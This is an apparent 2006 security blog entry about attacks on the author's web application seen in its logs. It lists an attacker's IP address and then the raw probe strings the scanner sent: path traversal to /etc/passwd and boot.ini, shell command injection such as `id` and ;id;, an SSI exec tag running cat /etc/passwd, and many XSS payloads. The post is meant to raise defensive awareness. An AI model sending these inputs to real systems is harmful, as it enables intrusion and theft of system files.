The Attack on Web Applications- Using Jedi Foresight

|

Level: Advanced

While conducting log analysis around a new web application we have been developing the ever vigilant Obijan
noticed what appears to be an individual using automated tools to probe the application
in several nefarious ways. We can also assume that they are running the same styles of attack
on all forms sitewide.

For example here we see attempts at:
- SQL Injection
- Path Traversal
- Remote Execution
- SSI (Server Side Includes)
- XSS (Cross Site Scripting)


The requests originated from this IP address: 69.3.195.226.
OrgName: Covad Communications Co.
OrgID: CVAD
Address: 2510 Zanker Rd.
City: San Jose
StateProv: CA
PostalCode: 95131
Country: US
Fortunately all the attacks were unsuccessful, but it is something to always
keep in mind when designing applications. Any application you put online will
be found by spiders and will be hammered at in any way, shape or form possible.
Here is a sample of some of the not so nice "requests" this person
made.

"`id`"
""
"id"
"|id"
"/../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../etc/passwd^^"
"id"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"`"
"/etc/passwd"
"/boot.ini"
"
"
"%00"
"%0a"
".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
"/../../../../../../../../bin/id|"
"/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
"/./././././././././././etc/passwd"
"/..\../..\../..\../..\../..\../..\../etc/passwd"
"/..\../..\../..\../..\../..\../..\../boot.ini"
"/./././././././././././boot.ini"
"/../../../../../../../../*"
","
";"
"\'"
"/'"
"*'"
""
"*"
"/"
""
"<!--#exec cmd=""/bin/cat /etc/passwd""-->"
"
/bin/cat /etc/passwd"
"/../../../../../../../../../../boot.ini"
";id;"
"\\'/bin/cat /etc/passwd\\'"
"`dir`"
"'"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"\..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"C:\boot.ini"
"C:/boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../../etc/passwd"
"
InjectedHeader: InjectedValue"
""";id"""
"|id|"
"/index.html|id|"
"../../../../../../../../conf/server.xml"
"<script>SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS');"">"
"""><LINK REL=""stylesheet"" HREF=""javascript:alert('SPI_XSS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')>"
"""><STYLE>@im\port""\ja\vasc\ript:alert('XSS')"";</STYLE>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')""><"
"<script>SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')""><"

About this Entry

This page contains a single entry by published on April 11, 2006 7:15 PM.

Pondering Security and My Perspective... was the previous entry in this blog.

Dell Decrappifier- From Cluttered to Pristine is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.